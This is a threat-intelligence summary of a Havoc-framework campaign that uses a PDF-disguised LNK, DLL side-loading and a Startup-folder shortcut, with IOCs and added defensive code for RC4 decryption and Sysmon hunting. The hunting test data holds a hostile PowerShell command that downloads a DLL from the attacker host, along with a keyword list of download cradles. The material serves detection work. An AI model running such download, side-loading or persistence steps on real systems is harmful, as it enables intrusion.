On January 15, 2025, a malicious LNK file named DH-Report76.pdf.lnk was discovered. It belongs to a campaign that downloads further payloads, including a DLL that hijacks the execution flow of a legitimate Windows executable, and that appears to target Bangladesh, Pakistan, and China using deceptive lures to deliver malicious content. Affected: Cybersecurity, Software, Cloud Services
Keypoints :
- A malicious LNK file named DH-Report76.pdf.lnk was uploaded to VirusTotal.
- The LNK file runs a PowerShell downloader that fetches its payloads from army-mil.b-cdn[.]net.
- The downloader retrieves two malicious DLLs: onelog.dll and sppc.dll.
- The legitimate Windows binary phoneactivate.exe is renamed to word.exe and abused for DLL side-loading: it loads the attacker's sppc.dll instead of the genuine system DLL of the same name.
- A shortcut pointing at the renamed executable is created in the Startup folder for persistence.
- The malware RC4-decrypts and loads the final payload, demon.x64.dll, the Havoc framework's Demon agent.
- The campaign overlaps with previously observed activity targeting Bangladesh, Pakistan, and China.
- The threat actors used Cloudflare Workers for command-and-control (C2) communications.
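The RC4 step above is the point where an analyst normally needs a small decryptor once the key has been pulled from the loader. The block below is an added example, not code from the original post or from the campaign's loader: a plain RC4 implementation plus the sanity check (DOS "MZ" stub and a PE signature at e_lfanew) used to confirm a candidate key actually produced a DLL. The key and the encrypted blob are constructed for the demo; the page does not give the real key.

```python
"""RC4 decrypt-and-validate helper (added example; not the campaign's own loader code).

DEMO_KEY and ENCRYPTED_BLOB are CONSTRUCTED: the real key used to unpack
demon.x64.dll is not given on this page.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap check applied after a candidate decryption: 'MZ' stub and a
    plausible e_lfanew (offset 0x3C) that points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def try_keys(candidates, ciphertext: bytes):
    """Try a short list of candidate keys; return (key, plaintext) of the first
    decryption that yields a PE image, or None if none does."""
    for key in candidates:
        plaintext = rc4(key, ciphertext)
        if looks_like_pe(plaintext):
            return key, plaintext
    return None


# --- constructed sample: a minimal fake PE image encrypted under a made-up key ---
FAKE_PE = bytearray(0x100)
FAKE_PE[:2] = b"MZ"
FAKE_PE[0x3C:0x40] = (0x80).to_bytes(4, "little")   # e_lfanew -> 0x80
FAKE_PE[0x80:0x84] = b"PE\0\0"
FAKE_PE = bytes(FAKE_PE)
DEMO_KEY = b"demo-rc4-key"                            # assumption: not the real key
ENCRYPTED_BLOB = rc4(DEMO_KEY, FAKE_PE)

if __name__ == "__main__":
    hit = try_keys([b"wrong", b"also-wrong", DEMO_KEY], ENCRYPTED_BLOB)
    print("recovered key:", hit[0] if hit else None)
```

In practice the candidate list comes from strings or immediate values near the loader's RC4 routine; the PE check is what stops a wrong key from being mistaken for a hit, since RC4 output under any key is just bytes.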
MITRE Techniques :
- T1204.002 – User Execution: Malicious File: the victim opens the LNK, disguised as a PDF by its double extension, which launches the PowerShell downloader.
- T1071.001 – Application Layer Protocol: Web Protocols: the downloader retrieves its payloads over HTTP, and C2 traffic passes through Cloudflare Workers.
- T1105 – Ingress Tool Transfer: onelog.dll and sppc.dll are fetched from army-mil.b-cdn[.]net.
- T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder: a shortcut in the Startup folder re-launches the renamed executable at logon.
- T1574.002 – Hijack Execution Flow: DLL Side-Loading: the renamed phoneactivate.exe (word.exe) loads the malicious sppc.dll in place of the legitimate system DLL.
Indicators of Compromise :
- [URL] http://army-mil.b-cdn[.]net/onelog.dll
- [URL] http://army-mil.b-cdn[.]net/sppc.dll
- [Domain] army-mil[.]zapto.org
- [Hash] SHA-256: 7498a07f903486473cce83fbf16b88009765af98326e1ebef4c48f103b874f65
- [Hash] SHA-256: 90f43a20a956b5d2e7b73cd3c2a6896a3af032414a297a23d0f07ef2f1016b17
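The indicators above cover only the infrastructure and file hashes; the behaviours in the keypoints (explorer-spawned PowerShell downloader, a renamed phoneactivate.exe, sppc.dll loaded from outside the system directory, a Startup-folder shortcut) survive an infrastructure change. The block below is an added hunting example, not from the original post: it runs both the IOC matches and those behavioural rules over constructed Sysmon-style event records. Field names follow Sysmon (Image, OriginalFileName, ImageLoaded, TargetFilename, Hashes, DestinationHostname); every path, user and host other than the IOCs quoted on this page is invented for the demo.

```python
"""Hunting rules for the IOCs and behaviours summarised on this page.

Added example, not code from the original post. SAMPLE_EVENTS are CONSTRUCTED
Sysmon-style records; only the hosts and SHA-256 values come from the page's IOC list.
"""
import ntpath   # Windows path handling regardless of the analyst's host OS
import re

IOC_HOSTS = {"army-mil.b-cdn.net", "army-mil.zapto.org"}
IOC_SHA256 = {
    "7498a07f903486473cce83fbf16b88009765af98326e1ebef4c48f103b874f65",
    "90f43a20a956b5d2e7b73cd3c2a6896a3af032414a297a23d0f07ef2f1016b17",
}
SIDELOAD_DLLS = {"sppc.dll", "onelog.dll"}
SYSTEM_DIR_RE = re.compile(r"\\Windows\\(System32|SysWOW64)\\", re.I)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
DOWNLOAD_CRADLE = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ")


def sha256_of(hashes_field: str) -> str:
    """Sysmon's Hashes field looks like 'SHA256=...,MD5=...'; return the SHA-256, lowercased."""
    for part in hashes_field.split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return value.strip().lower()
    return ""


def check_event(ev: dict) -> list:
    """Return the names of every rule the event trips; an empty list means clean."""
    hits = []
    kind = ev.get("EventType")
    image = ntpath.basename(ev.get("Image", "")).lower()
    if kind == "ProcessCreate":
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        cmd = ev.get("CommandLine", "").lower()
        # LNK double-click: explorer.exe spawning PowerShell with a download cradle or an IOC host.
        if image == "powershell.exe" and parent == "explorer.exe" and (
            any(c in cmd for c in DOWNLOAD_CRADLE) or any(h in cmd for h in IOC_HOSTS)
        ):
            hits.append("explorer_spawned_powershell_downloader")
        # Renamed LOLBin: version info still says phoneactivate.exe but the on-disk name differs.
        if ev.get("OriginalFileName", "").lower() == "phoneactivate.exe" and image != "phoneactivate.exe":
            hits.append("renamed_phoneactivate")
    elif kind == "ImageLoad":
        loaded = ev.get("ImageLoaded", "")
        # A system DLL name such as sppc.dll resolved outside System32/SysWOW64 is the side-load signal.
        if ntpath.basename(loaded).lower() in SIDELOAD_DLLS and not SYSTEM_DIR_RE.search(loaded):
            hits.append("dll_sideload_outside_system_dir")
        if sha256_of(ev.get("Hashes", "")) in IOC_SHA256:
            hits.append("ioc_sha256")
    elif kind == "FileCreate":
        if STARTUP_LNK_RE.search(ev.get("TargetFilename", "")):
            hits.append("startup_folder_lnk")
    elif kind == "NetworkConnect":
        if ev.get("DestinationHostname", "").lower() in IOC_HOSTS:
            hits.append("ioc_host")
    return hits


def hunt(events: list) -> dict:
    """Map event index -> rule hits for every event that tripped at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}


APPDATA = r"C:\Users\analyst\AppData\Roaming"   # constructed path
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
                    "'http://army-mil.b-cdn.net/sppc.dll','sppc.dll')"},
    {"EventType": "ProcessCreate", "Image": APPDATA + r"\word.exe", "OriginalFileName": "PhoneActivate.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "word.exe"},
    {"EventType": "ImageLoad", "Image": APPDATA + r"\word.exe", "ImageLoaded": APPDATA + r"\sppc.dll",
     "Hashes": "SHA256=7498A07F903486473CCE83FBF16B88009765AF98326E1EBEF4C48F103B874F65,MD5=" + "0" * 32},
    {"EventType": "ImageLoad", "Image": r"C:\Windows\System32\slui.exe",
     "ImageLoaded": r"C:\Windows\System32\sppc.dll", "Hashes": "SHA256=" + "a" * 64},   # benign load
    {"EventType": "FileCreate",
     "TargetFilename": APPDATA + r"\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk"},
    {"EventType": "NetworkConnect", "Image": APPDATA + r"\word.exe", "DestinationHostname": "army-mil.zapto.org"},
    {"EventType": "NetworkConnect", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "www.mozilla.org"},                                        # benign connect
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The benign records (slui.exe loading sppc.dll from System32, a browser connecting elsewhere) are included so the rules can be checked for false positives: the side-load rule keys on the DLL's directory, not its name alone, and the renamed-binary rule compares the PE's OriginalFileName against the on-disk name rather than alerting on word.exe as a string.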
Full Story: https://dmpdump.github.io/posts/Havoc/